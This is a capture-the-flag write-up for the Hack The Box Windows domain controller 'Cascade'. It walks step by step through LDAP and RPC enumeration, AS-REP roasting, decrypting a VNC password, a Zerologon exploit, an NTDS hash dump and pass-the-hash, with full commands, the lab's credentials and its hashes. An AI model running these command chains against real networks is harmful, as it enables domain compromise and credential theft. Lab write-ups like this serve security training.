HTB - Cascade

Machine Info

Cascade is a medium difficulty Windows machine configured as a Domain Controller. LDAP anonymous binds are enabled, and enumeration yields the password for user r.thompson, which gives access to a TightVNC registry backup. The backup is decrypted to gain the password for s.smith. This user has access to a .NET executable, which after decompilation and source code analysis reveals the password for the ArkSvc account. This account belongs to the AD Recycle Bin group, and is able to view deleted Active Directory objects. One of the deleted user accounts is found to contain a hardcoded password, which can be reused to login as the primary domain administrator.

Enumeration

Scope

IP Address: 10.10.10.182

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE       REASON
53/tcp   open  domain        syn-ack
88/tcp   open  kerberos-sec  syn-ack
135/tcp  open  msrpc         syn-ack
139/tcp  open  netbios-ssn   syn-ack
389/tcp  open  ldap          syn-ack
445/tcp  open  microsoft-ds  syn-ack
636/tcp  open  ldapssl       syn-ack
3268/tcp open  globalcatLDAP syn-ack
5985/tcp open     wsman      syn-ack                                                                                                   
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-10 02:05:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-10T02:05:33
|_  start_date: 2024-07-10T01:57:18
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: 5s

* Open ports: 53,88,135,139,389,445,636,3268,5985
* UDP Open ports: 53- 123 - 389
* Services: DNS - KERBEROS - RPC - LDAP - SMB - winRM
* Versions: (Windows Server 2008 R2 SP1) - Microsoft DNS 6.1.7601
* Important Notes:  - Domain: cascade.local

DNS Enumeration

No zone transfer available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ dig axfr cascade.local @$ip

; <<>> DiG 9.19.19-1-Debian <<>> axfr cascade.local @10.10.10.182
;; global options: +cmd
; Transfer failed.

RPC Enumeration

Found usernames from rpc calls

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ rpcclient -U "%" $ip

rpcclient $> enumdomusers

user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

Filter out these users and create a list of them

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1  | tee -a users.lst
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft

SMB Enumeration

No data from smb

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ smbclient -N -L //$ip
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                      

SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\: 
SMB         10.10.10.182    445    CASC-DC1         [-] Error enumerating shares: STATUS_ACCESS_DENIED

Kerberos Enumeration

I want to check that users I found are valid on the domain, So I will verify this with Kerbrute

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ kerbrute userenum --dc $ip -d cascade.local -t 100 -o users.list ./users.lst

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        


2024/07/09 22:15:36 >  [+] VALID USERNAME:       j.wakefield@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       arksvc@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       a.turnbull@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       j.goodhand@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       r.thompson@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       d.burman@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       s.smith@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       BackupSvc@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       j.allen@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       util@cascade.local
2024/07/09 22:15:36 >  [+] VALID USERNAME:       s.hickson@cascade.local
2024/07/09 22:15:36 >  Done! Tested 15 usernames (11 valid) in 5.263 seconds

11/15 valid usernames, Let's attempt ASREP-Roasting attack against these users

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ impacket-GetNPUsers cascade.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst 

[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set

I got no hash from this attack, Let's switch to ldap protocol

LDAP Enumeration

I will use ldapsearch with the following flags
- -x simple authentication
- -b principal name
- -s scope
- sub subtree
- '*' all

The output was too big, So I searched for Users section for anything might be helpful. there were a lot of users details but this user below has a different record cascadeLegacyPwd .

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ ldapsearch -H ldap://$ip -x -b "DC=cascade,DC=local" -s sub '*'

<snip>
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
<Snip>
cascadeLegacyPwd: clk0bjVldmE=

It's a base64 encoding , Let's decode it in our terminal

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ base64 -d<<< clk0bjVldmE=
rY4n5eva

It might be a password for that user, Let's check with crackmapexec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'r.thompson'  -p 'rY4n5eva'

SMB   10.10.10.182    445    CASC-DC1   [+] cascade.local\r.thompson:rY4n5eva

I also want to see if we can access the machine with winRM , but It failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec winrm $ip -u 'r.thompson'  -p 'rY4n5eva'

WINRM  10.10.10.182    5985   CASC-DC1  [-] cascade.local\r.thompson:rY4n5eva

I will continue enumerate the domain with the credentials I found

Initial Access

Bloodhound-python

Fire up bloodhound.py and prepare the zip file for BloodHound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ bloodhound-python -u 'r.thompson' -p 'rY4n5eva' -ns $ip -d cascade.local -c all

INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: casc-dc1.cascade.local
INFO: Found 18 users
INFO: Found 53 groups
INFO: Found 7 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CASC-DC1.cascade.local

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ zip cascade.zip *.json

Upload the data to bloodhound

SMB Credentialed Enumeration

List out the shares we have access to and In the next command I will crawl to the shares with Spider_plus Module

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'r.thompson'  -p 'rY4n5eva' --shares

SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
SMB         10.10.10.182    445    CASC-DC1         [+] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$                          
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'r.thompson'  -p 'rY4n5eva' --shares -M spider_plus
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
SPIDER_P... 10.10.10.182    445    CASC-DC1         [*] Started spidering plus with option:
SPIDER_P... 10.10.10.182    445    CASC-DC1         [*]        DIR: ['print$']
SPIDER_P... 10.10.10.182    445    CASC-DC1         [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.182    445    CASC-DC1         [*]       SIZE: 51200
SPIDER_P... 10.10.10.182    445    CASC-DC1         [*]     OUTPUT: /tmp/cme_spider_plus

These files took my attention, So I downloaded them to my kali machine for examination


        "IT/Email Archives/Meeting_Notes_June_2018.html": {
            "atime_epoch": "2020-01-15 20:08:46",
            "ctime_epoch": "2020-01-15 20:08:46",
            "mtime_epoch": "2020-01-28 13:00:30",
            "size": "2.46 KB"
        },
        
        "IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log": {
            "atime_epoch": "2020-01-10 11:19:20",
            "ctime_epoch": "2020-01-10 11:19:20",
            "mtime_epoch": "2020-01-28 20:19:11",
            "size": "1.27 KB"
        },
        "IT/Logs/DCs/dcdiag.log": {
            "atime_epoch": "2020-01-10 11:17:30",
            "ctime_epoch": "2020-01-10 11:17:30",
            "mtime_epoch": "2020-01-26 17:22:05",
            "size": "5.83 KB"
        },
        <snip>
        
        "IT/Temp/s.smith/VNC Install.reg": {
            "atime_epoch": "2020-01-28 14:27:43",
            "ctime_epoch": "2020-01-28 14:27:43",
            "mtime_epoch": "2020-01-28 15:00:01",
            "size": "2.62 KB"

        "cascade.local/scripts/MapAuditDrive.vbs": {
            "atime_epoch": "2020-01-15 16:45:08",
            "ctime_epoch": "2020-01-15 16:45:08",
            "mtime_epoch": "2020-01-15 16:50:14",
            "size": "258 Bytes"
        },
        "cascade.local/scripts/MapDataDrive.vbs": {
            "atime_epoch": "2020-01-15 16:50:28",
            "ctime_epoch": "2020-01-15 16:49:19",
            "mtime_epoch": "2020-01-15 16:51:03",
            "size": "255 Bytes"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat Meeting_Notes_June_2018.html

<snip>
<p>For anyone that missed yesterdays meeting (Im looking at
you Ben). Main points are below:</p>

<p class=MsoNormal><o:p>&nbsp;</o:p></p>

<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>

<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>

<p>-- The winner of the Best GPO competition will be
announced on Friday so get your submissions in soon.</p>

There is user TempAdmin and we need to find his password.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat VNC\ Install.reg              

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
<snip>
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
6bcf2a4b6e5aca0f

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ xxd -r -p <<<6bcf2a4b6e5aca0f
k*KnZ

This is encrypted password for VNC SERVER, So we need to decrypt it

GitHub - jeroennijhof/vncpwd: VNC Password DecrypterGitHub

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo /opt/vncpwd/vncpwd pass_enc 
Password: sT333ve2

Confirm access

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 's.smith'  -p 'sT333ve2'        

SMB    10.10.10.182    445    CASC-DC1      [+] cascade.local\s.smith:sT333ve2

Access the machine and get the flag

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ evil-winrm -i $ip -u 's.smith'  -p 'sT333ve2'

*Evil-WinRM* PS C:\Users\s.smith\Documents> type ..\Desktop\user.txt
4701aeb4858f9ab9d7cxxxxxxxxxxxx

User Flag: 4701aeb4858f9ab9d7cxxxxxxxxxxxx

Privilege Escalation

After I solved the machine, I knew from the community the following attack path was unintended, So I added the intended path to this section, too

Unintended Path

Since, The machine release date is 2020, There is a CVE was published on the same year that allow Domain Admins rights from

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 's.smith'  -p 'sT333ve2' -M zerologon

SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2
ZEROLOGO... 10.10.10.182    445    CASC-DC1         VULNERABLE
ZEROLOGO... 10.10.10.182    445    CASC-DC1         Next step: https://github.com/dirkjanm/CVE-2020-1472

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ python3 /opt/CVE-2020-1472/cve-2020-1472-exploit.py CASC-DC1$ $ip

Performing authentication attempts...
========================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!

Dump the ntds database

└─$ impacket-secretsdump cascade.local/'CASC-DC1$'@$ip -no-pass -just-dc
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

cascade.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:7c2ea40b06d267f15xxxxxxxxxxxxxx:::
cascade.local\CascGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3a1b37192392d74e86d04242288dc147:::
cascade.local\arksvc:1106:aad3b435b51404eeaad3b435b51404ee:10ffc991edaa4635cf81eb91762420cb:::
cascade.local\s.smith:1107:aad3b435b51404eeaad3b435b51404ee:b48b49789458698abadc119c8e310703:::
cascade.local\r.thompson:1109:aad3b435b51404eeaad3b435b51404ee:63251f7b1bada5082e5ffb18261ba28f:::
cascade.local\util:1111:aad3b435b51404eeaad3b435b51404ee:49a914ea7201025aeff21cd858ec7d66:::
cascade.local\j.wakefield:1116:aad3b435b51404eeaad3b435b51404ee:13ae5d7704258917054d662d016eab60:::
cascade.local\s.hickson:1121:aad3b435b51404eeaad3b435b51404ee:2776416ceb426c515cab11bb8411067b:::
cascade.local\j.goodhand:1122:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\a.turnbull:1124:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\e.crowe:1127:aad3b435b51404eeaad3b435b51404ee:95d4f729c16ae37b910317d665ba2215:::
cascade.local\b.hanson:1128:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\d.burman:1129:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\BackupSvc:1130:aad3b435b51404eeaad3b435b51404ee:c27e154566c4788326fce339f4b55491:::
cascade.local\j.allen:1134:aad3b435b51404eeaad3b435b51404ee:64928a685f9a995045f8c04bbf86881d:::
cascade.local\i.croft:1135:aad3b435b51404eeaad3b435b51404ee:431682a8242a237e805badacab95b0e4:::
CASC-DC1$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<snip>

Access the machine ad administrator with psexe.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ impacket-psexec cascade.local/administrator@$ip -hashes :7c2ea40b06d267f15xxxxxxxxxxxxxx
<snip>
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
89f1c7a9f45ddf6f59cxxxxxxxxxxxxxx

Root Flag: 89f1c7a9f45ddf6f59cxxxxxxxxxxxxxx

Intended Path

After exploring the shares with crackmapexec as user s.smith, I found that he has read access on audit$ share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 's.smith'  -p 'sT333ve2' --shares

SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2
SMB         10.10.10.182    445    CASC-DC1         [+] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$          READ
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ smbclient -U s.smith \\\\$ip\Audit$

smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                      An    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                     An    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat RunAudit.bat             
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

let's download CascAudit.exe and examine it in dnSpy.exe

The script check of provided arguments.

if (MyProject.Application.CommandLineArgs.Count != 1)
{
	Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
	return;
}

RunAudit.bat shows the command and appropriate argument

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat RunAudit.bat             
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

When reading the code, it has a connection string consist of username, domain name, password, So I put breakpoint on text2 to get the password

Provide the path of Audit.db as argument to make the script work properly

We got the username, domain name, and password

Confirm Access

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'arksvc' -p "w3lc0meFr31nd"      

SMB  10.10.10.182    445    CASC-DC1   [+] cascade.local\arksvc:w3lc0meFr31nd

From bloodhound, the user arksvc is a member of AD RECYCLE BIN group which has access to AD Deleted Object

From HackTricks:

Privileged Groups - HackTricksbook.hacktricks.xyz

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

<snip>
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOxxxxxxx
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=casc
ade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin

We saw Tempadmin before and this record is important cascadeLegacyPwd: YmFDVDNyMWFOxxxxxxx

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat Meeting_Notes_June_2018.html

<snip>
Username is TempAdmin (password is the same as the normal admin account password). </p>
<snip>

Decode the value we found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ base64 -d <<<YmFDVDNyMWFOMxxxxxxx 
baCT3r1axxxxxxx

If we combine the pieces together the decoded password is the password of the administrator account

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'baCT3r1axxxxxxx'

SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)

Get the flag

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'baCT3r1aN00dles' -x "type C:\\Users\\Administrator\\Desktop\\root.txt"
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)
SMB         10.10.10.182    445    CASC-DC1         [+] Executed command 
SMB         10.10.10.182    445    CASC-DC1         89f1c7a9f45ddf6f59cxxxxxxxxxxxxxx

Root Flag: 89f1c7a9f45ddf6f59cxxxxxxxxxxxxxx

PreviousHTB - StreamIO NextHTB - Monteverde

Last updated 1 year ago